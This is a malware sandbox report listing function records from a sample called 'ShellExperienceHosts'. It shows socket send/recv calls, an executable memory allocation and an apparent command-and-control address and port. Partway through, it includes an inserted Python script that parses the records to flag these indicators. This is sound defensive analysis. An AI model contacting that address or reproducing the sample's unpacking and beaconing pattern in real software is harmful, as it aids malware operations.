                                                                            • String ID: 118.107.44.112$18091
                                                                            • API String ID: 3472027048-2998964670
                                                                            • Opcode ID: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                                                            • Instruction ID: d4922cd372dd7236031f7b79510b5f56ce2b8beeb54c8bf7640301d5853f9da9
                                                                            • Opcode Fuzzy Hash: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                                                            • Instruction Fuzzy Hash: C9D023F0604871CBE928C500DC5447A7375F7C42513940105FC479B144CB74FC08D550
                                                                            APIs
                                                                            • __getptd_noexit.LIBCMT ref: 1000715B
                                                                              • Part of subcall function 10009896: GetLastError.KERNEL32(00000001,00000000,10007112,10006F0C,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 1000989A
                                                                              • Part of subcall function 10009896: ___set_flsgetvalue.LIBCMT ref: 100098A8
                                                                              • Part of subcall function 10009896: __calloc_crt.LIBCMT ref: 100098BC
                                                                              • Part of subcall function 10009896: DecodePointer.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 100098D6
                                                                              • Part of subcall function 10009896: GetCurrentThreadId.KERNEL32 ref: 100098EC
                                                                              • Part of subcall function 10009896: SetLastError.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 10009904
                                                                            • __freeptd.LIBCMT ref: 10007165
                                                                              • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A79
                                                                              • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A8B
                                                                              • Part of subcall function 10009A58: DecodePointer.KERNEL32(00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009AA1
                                                                              • Part of subcall function 10009A58: __freefls@4.LIBCMT ref: 10009AAC
                                                                              • Part of subcall function 10009A58: TlsSetValue.KERNEL32(00000021,00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ABE
                                                                            • ExitThread.KERNEL32 ref: 1000716E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 4224061863-0
                                                                            • Opcode ID: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                                                            • Instruction ID: 88b9861ec1dd8ad2b25034eab61c1c94f8d4b81d5381debfb6d8fd2c6c03db1f
                                                                            • Opcode Fuzzy Hash: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                                                            • Instruction Fuzzy Hash: 79C02B3050060C7BFB00A776CC0E95F3A8DDF811C1F668010F80CC5159EE38FC008291
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C737325
                                                                              • Part of subcall function 6C6E3FFF: __EH_prolog3_GS.LIBCMT ref: 6C6E4009
                                                                              • Part of subcall function 6C6E3FFF: GetCurrentThread.KERNEL32 ref: 6C6E4068
                                                                              • Part of subcall function 6C6E3FFF: GetCurrentThreadId.KERNEL32 ref: 6C6E4071
                                                                              • Part of subcall function 6C6E3FFF: GetVersionExW.KERNEL32 ref: 6C6E410D
                                                                              • Part of subcall function 6C737608: __EH_prolog3.LIBCMT ref: 6C73760F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentH_prolog3Thread$H_prolog3_Version
                                                                            • String ID: Workspace
                                                                            • API String ID: 3621167777-258310842
                                                                            • Opcode ID: ce2493f77e2529e162872a958e7b01220b3ae02185872ff596526a535c50e63e
                                                                            • Instruction ID: 409afa04bef014f27e05b4dd48f1c568b7861f66ecd16dc7c6bff9483cd54d34
                                                                            • Opcode Fuzzy Hash: ce2493f77e2529e162872a958e7b01220b3ae02185872ff596526a535c50e63e
                                                                            • Instruction Fuzzy Hash: 4F21F3B0A01A56EFC758CF78C544BD9FAA4BF49304F50872A903DA7740D7706629CB95
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 031A022B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                            • Instruction ID: 152f33c81f1c04fd291e4e65cc2f7acffd2b889e5a8e233fba8d5fd6b8390867
                                                                            • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                            • Instruction Fuzzy Hash: EDA13D79A00A06EFDB14CFADC880AAEB7B5FF4C305F1881A9E415DB651D770E951CB90
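Two records above carry the findings a responder reads first: the function at 031A022B calls VirtualAlloc with flAllocationType 00001000 (MEM_COMMIT) and flProtect 00000040 (PAGE_EXECUTE_READWRITE) from a memory region the report marks "based on PE: false", and the Sleep-only function at offset 10000000 carries the String ID 118.107.44.112$18091, which the report's own "$"-joined string convention reads as an address and a port. The script below is an added example, not code from the Joe Sandbox report or from the sample: it parses records in the plugin's listing format, decodes the VirtualAlloc arguments against the winnt.h constants, flags executable allocations (graver when the caller is itself not PE-backed, i.e. already unpacked), and pulls host$port candidates from String IDs. SAMPLE is copied from the records on this page, trimmed to the fields the parser reads; field names such as `caller_backed_by_pe` are the example's own.

```python
"""Parse Joe Sandbox IDA-plugin function records (the APIs / Memory Dump Source /
Similarity blocks above) and surface VirtualAlloc calls that request executable
memory plus String IDs shaped like a host$port C2 pair. Added example, not code
from the report; SAMPLE is copied from the report's records, trimmed."""
import re
from dataclasses import dataclass, field

MEM_COMMIT = 0x1000                               # winnt.h
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80    # any PAGE_EXECUTE* protection
PROTECT_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# e.g. "• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 031A022B"
API_RE = re.compile(r"^•\s*(?P<name>[\w@]+)\.(?P<module>[\w@]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SOURCE_RE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
STRING_RE = re.compile(r"^•\s*String ID:\s*(?P<s>.*)$")
# Joe Sandbox joins several strings with '$', hence "118.107.44.112$18091"
C2_RE = re.compile(r"^(?P<host>\d{1,3}(?:\.\d{1,3}){3})\$(?P<port>\d{1,5})$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # raw hex strings, or '?' where the plugin could not resolve a value
    ref: int     # call-site address

@dataclass
class Record:
    apis: list = field(default_factory=list)
    offset: int = 0
    based_on_pe: bool = True   # False: region not backed by a PE file (unpacked code)
    string_id: str = ""

def parse_records(text):
    """One Record per 'APIs' header; 'Part of subcall' lines belong to callees."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Record()
            records.append(cur)
        elif cur is None or line.startswith("• Part of subcall"):
            continue
        elif (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif (m := SOURCE_RE.search(line)):
            cur.offset, cur.based_on_pe = int(m["offset"], 16), m["pe"] == "true"
        elif (m := STRING_RE.match(line)):
            cur.string_id = m["s"]
    return records

def _hex(arg):
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None

def find_executable_allocations(records):
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) with an execute
    bit set; graver when the caller itself is not PE-backed (already unpacked)."""
    hits = []
    for rec in records:
        for call in rec.apis:
            if call.name != "VirtualAlloc" or len(call.args) != 4:
                continue
            alloc_type, protect = _hex(call.args[2]), _hex(call.args[3])
            if protect is None or not protect & PAGE_EXECUTE_MASK:
                continue
            hits.append({"ref": f"{call.ref:08X}",
                         "protect": PROTECT_NAMES.get(protect, hex(protect)),
                         "commit": bool(alloc_type and alloc_type & MEM_COMMIT),
                         "caller_backed_by_pe": rec.based_on_pe})
    return hits

def extract_c2_candidates(records):
    """(host, port) from String IDs shaped like '<ipv4>$<port>'."""
    return [(m["host"], int(m["port"])) for rec in records
            if (m := C2_RE.match(rec.string_id)) and 0 < int(m["port"]) < 65536]

SAMPLE = """APIs
• __floor_pentium4.LIBCMT ref: 1000112F
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1000115F
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001192
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• String ID:
APIs
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• API ID: Sleep
• String ID: 118.107.44.112$18091
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 031A022B
Memory Dump Source
• Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
"""
```

Run it over the full function listing (`parse_records(open(path).read())`) rather than SAMPLE; the PAGE_READWRITE allocations at 1000115F and 0332115F are not reported, only the RWX one at 031A022B. A host$port String ID is a candidate, not a confirmed C2: confirm it against the report's network section before acting on it.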
                                                                            APIs
                                                                              • Part of subcall function 6C86C1B4: GetConsoleOutputCP.KERNEL32(05BCD017,00000000,00000000,00000000), ref: 6C86C217
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,?,6C86022D,00000000,00000000), ref: 6C86BF8F
                                                                            • GetLastError.KERNEL32 ref: 6C86BF99
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                            • String ID:
                                                                            • API String ID: 2915228174-0
                                                                            • Opcode ID: a89eef81f6dc3a39e76a8e2b96420c5fad6a4245ac8fd78a80678e752a588843
                                                                            • Instruction ID: 231fcf8d670cc2f391feb7cca452115f520ae7b4024fe45a4abdb82e5991fa9f
                                                                            • Opcode Fuzzy Hash: a89eef81f6dc3a39e76a8e2b96420c5fad6a4245ac8fd78a80678e752a588843
                                                                            • Instruction Fuzzy Hash: 7461D471D04119AFDF21DFA9CA44EEEBBB9AF0A30CF140955F910A7A12D332D905DBA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Time_memmovetime
                                                                            • String ID:
                                                                            • API String ID: 1463837790-0
                                                                            • Opcode ID: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                            • Instruction ID: 7472951ecdc6142c721ad3348498c8fe017ad8d952fa801f9fd3c423b9f36496
                                                                            • Opcode Fuzzy Hash: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                            • Instruction Fuzzy Hash: A5519F767006029FE316CF69C8C0A9BB7A9FF48294715C669E919CB709DB31FC51CB90
                                                                            APIs
                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003023
                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 10003044
                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexitrecvselect
                                                                            • String ID:
                                                                            • API String ID: 4248608111-0
                                                                            • Opcode ID: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                                                            • Instruction ID: 1cbb114b02e0d86a534962cf0a51f77a1151a50c8d60f66bd4e8238187776ab9
                                                                            • Instruction Fuzzy Hash: 7F21E770A01318EBFB11DF64DC95B9B73B8EF053D0F1081A5E5095B199DBB1AD84CBA1
                                                                            APIs
                                                                            • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03323043
                                                                            • recv.WS2_32(?,?,00040000,00000000), ref: 03323064
                                                                              • Part of subcall function 0332F91B: __getptd_noexit.LIBCMT ref: 0332F91B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexitrecvselect
                                                                            • String ID:
                                                                            • API String ID: 4248608111-0
                                                                            • Opcode ID: 4a22114ee7a163ecc7336b5ad7390d3f86b132129b07d64dde714ca443363a57
                                                                            • Instruction ID: ae67ac47a3c116bd7d4d00d02398e273e868ad6857817e3351deb5e1106b0eca
                                                                            • Instruction Fuzzy Hash: 1921A8789003289FDB20EF69DCC5B9B7BB4EF04720F1845A5E5459F190D778A984CBB1
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,?,6C86BF75,00000000,?,00000000,?,00000000,00000000), ref: 6C86C67F
                                                                            • GetLastError.KERNEL32 ref: 6C86C6A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID:
                                                                            • API String ID: 442123175-0
                                                                            • Opcode ID: 36c3575d328ebe5206170519712a3216e15082b651cd7aa3a4a1171c1e8923dc
                                                                            • Instruction ID: 3747ec6ce5425d2b0e26a70490a1ab56d20c96074b25c967d744daddeb78980e
                                                                            • Instruction Fuzzy Hash: A521B130A002199BCF29DF1AC9809DDB7B9EB4D305F2485AEE906D7612D730DE46CF65
                                                                            APIs
                                                                            • send.WS2_32(?,?,00040000,00000000), ref: 03323291
                                                                            • send.WS2_32(?,?,?,00000000), ref: 033232CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: send
                                                                            • String ID:
                                                                            • API String ID: 2809346765-0
                                                                            • Opcode ID: 55d86d05b1e9edb7fd8f8241ea4acd49ec1cb6a552e8fd68b8b9a0a614a8ce91
                                                                            • Instruction ID: 9413f97fa54afdc008cd33bfa4adbe6e9ebd57cae2ee4116db96fc57ac72fcdc
                                                                            • Instruction Fuzzy Hash: 9611E57AB01324A7C760CA6ADCC8B5ABFADFB45374F144125F908D7280D278AD418654
                                                                            APIs
                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,6C86A027,00000000,00000000,00000000,00000002,00000000), ref: 6C86A1AB
                                                                            • GetLastError.KERNEL32(?), ref: 6C86A1B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 8e371779aaa37c4d27d095733c665105baf1504469c5548c47eee0fe64bcda20
                                                                            • Instruction ID: 80853eb7cf6f5114f9c1a7927e47d34257d4d0cfcee26efd341a388455469ee8
                                                                            • Instruction Fuzzy Hash: C0010432604269AFCB158F5ADC05DDE3F69EF86328B240619E8129BAD0E771E951CB90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: SleepTimetime
                                                                            • String ID:
                                                                            • API String ID: 346578373-0
                                                                            • Opcode ID: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                                                            • Instruction ID: 27fac5dcdbeed923c3366fb10e8a319fa95706dbc2a1d72b4a6ad2049d896b26
                                                                            • Instruction Fuzzy Hash: B501DF31A00206AFE302DF65C8C4BABB3F9FB99381F108624D1018B294C771ADD6C7E1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: SleepTimetime
                                                                            • String ID:
                                                                            • API String ID: 346578373-0
                                                                            • Opcode ID: c3c65a646049d640eb036b155a49fb729badaf6c80d3565251da63ab00622729
                                                                            • Instruction ID: 1243a1c6b0f7bd2a63ba58cb988e12ae2e13dd39e4dd9d14546e63786cb41535
                                                                            • Instruction Fuzzy Hash: EF01D439600215AFD315EF29CCC8BA9FBB9FB59321F184264E60497180C735B9C6C7D1
                                                                            APIs
                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,10005AF2), ref: 1000642B
                                                                            • _free.LIBCMT ref: 10006466
                                                                              • Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
                                                                              • Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                            • String ID:
                                                                            • API String ID: 1116298128-0
                                                                            • Opcode ID: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                                                            • Instruction ID: d75aab6d42964042dd9719b22c7254e4122bf8c787039a32894d973a0e8f9c7d
                                                                            • Instruction Fuzzy Hash: D6017EF4A00B408FD321CF6A8884A47FAF9FF98750B104A1EE2DAC7A10D770A545CF55
                                                                            APIs
                                                                            • HeapCreate.KERNEL32(00000004,00000000,00000000,0332E04E,00000000,03329800,?,?,?,00000000,0334125B,000000FF,?,0332E04E), ref: 0332CD1B
                                                                            • _free.LIBCMT ref: 0332CD56
                                                                              • Part of subcall function 03321280: __CxxThrowException@8.LIBCMT ref: 03321290
                                                                              • Part of subcall function 03321280: DeleteCriticalSection.KERNEL32(00000000,0332D3E6,03346624,?,?,0332D3E6,?,?,?,?,03345A40,00000000), ref: 033212A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                            • String ID:
                                                                            • API String ID: 1116298128-0
                                                                            • Opcode ID: 39e9c47ad2b624af580714096cb34a33ef42271309d25cff50d1605e1c888662
                                                                            • Instruction ID: f26e6971cd72577f2083076aa8f592a38e2a96634de12805c3b313c0a4e755a8
                                                                            • Instruction Fuzzy Hash: 4F017AB4A00B508FC330DF6A9884A07FAF8FF98700B144A1EE6DAC7A10D370A105CFA5
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                            • GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
